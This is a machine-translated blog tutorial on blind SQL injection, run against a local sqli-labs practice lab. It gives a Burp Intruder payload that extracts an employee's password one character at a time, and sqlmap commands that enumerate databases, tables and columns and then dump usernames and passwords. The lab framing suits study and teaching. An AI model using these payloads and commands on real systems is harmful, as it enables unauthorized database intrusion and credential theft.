当前位置:网站首页>[tools run SQL blind note]
[tools run SQL blind note]
2022-07-03 04:38:00 【Black zone (rise)】
Catalog
One 、( Tools )burp Running blind injection
1.2、 Method 2 : Injection statement explosion
Two 、( Tools )sqlmap Run Boolean blind injection
First step : Detect whether there is injection
The second step : Burst database name
The third step : Burst database table name
One 、( Tools )burp Running blind injection
1.1、 Method 1 : Blast
After grabbing the bag , Send the request to "Intruder" modular
Set up 2 Payloads
1.2、 Method 2 : Injection statement explosion
Inject construct statements , Iterate
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
Two 、( Tools )sqlmap Run Boolean blind injection
2.1、 command :
-u Specify injection point
--dbs Run to the library name
--tables Running Watch name
--columns Run field name
--dump Enumerating data
Run out of the corresponding rear , Add... In turn -D Specify the library -T Designated table -C Specified field
2.2、 Use process :
First step : Detect whether there is injection
Basic operation
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch Is to use the default settings
In fact, the environment has been swept out
You can add --dbms mysql 了
The second step : Burst database name
command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-dbs --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
The third step : Burst database table name
command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step four : Pop field name
command :
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step five : Burst data
command :
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation :
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3、 ... and 、 recommend
【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process
【SQL Inject - With echo 】DNS Request injection : principle 、 platform 、 Using process 、 To configure
边栏推荐
- Kingbasees plug-in KDB of Jincang database_ database_ link
- 联发科技2023届提前批IC笔试(题目)
- Number of 1 in binary (simple difficulty)
- JS multidimensional array to one-dimensional array
- BMZCTF simple_ pop
- Web - Information Collection
- [fairseq] error: typeerror:_ broadcast_ coalesced(): incompatible function arguments
- What's wrong with SD card data damage? How to recover SD card data damage
- [set theory] Cartesian product (concept of Cartesian product | examples of Cartesian product | properties of Cartesian product | non commutativity | non associativity | distribution law | ordered pair
- [pat (basic level) practice] - [simple simulation] 1063 calculate the spectral radius
猜你喜欢
使用BENCHMARKSQL工具对kingbasees并发测试时kill掉主进程成功后存在子线程未及时关闭
Leetcode simple question: the key with the longest key duration
Php+mysql registration landing page development complete code
Arthas watch grabs a field / attribute of the input parameter
Small sample target detection network with attention RPN and multi relationship detector (provide source code, data and download)
消息队列(MQ)介绍
MC Layer Target
The least operation of leetcode simple problem makes the array increment
C language series - Section 3 - functions
How to retrieve the password for opening word files
随机推荐
The usage of micro service project swagger aggregation document shows all micro service addresses in the form of swagger grouping
MC Layer Target
RSRS指标择时及大小盘轮动
Joint set search: merge intervals and ask whether two numbers are in the same set
Library management system based on SSM
Smart contract security audit company selection analysis and audit report resources download - domestic article
Dive Into Deep Learning——2.1数据操作&&练习
Sdl2 + OpenGL glsl practice (Continued)
金仓数据库KingbaseES 插件kdb_date_function
How to choose cross-border e-commerce multi merchant system
Jincang KFS data bidirectional synchronization scenario deployment
使用BENCHMARKSQL工具对kingbaseES执行灌数据提示无法找到JDBC driver
Day 51 - tree problem
I've been in software testing for 8 years and worked as a test leader for 3 years. I can also be a programmer if I'm not a professional
Reptile exercise 02
What's wrong with SD card data damage? How to recover SD card data damage
Golang -- realize file transfer
Php+mysql registration landing page development complete code
Factor stock selection scoring model
2022 registration of G2 utility boiler stoker examination and G2 utility boiler stoker reexamination examination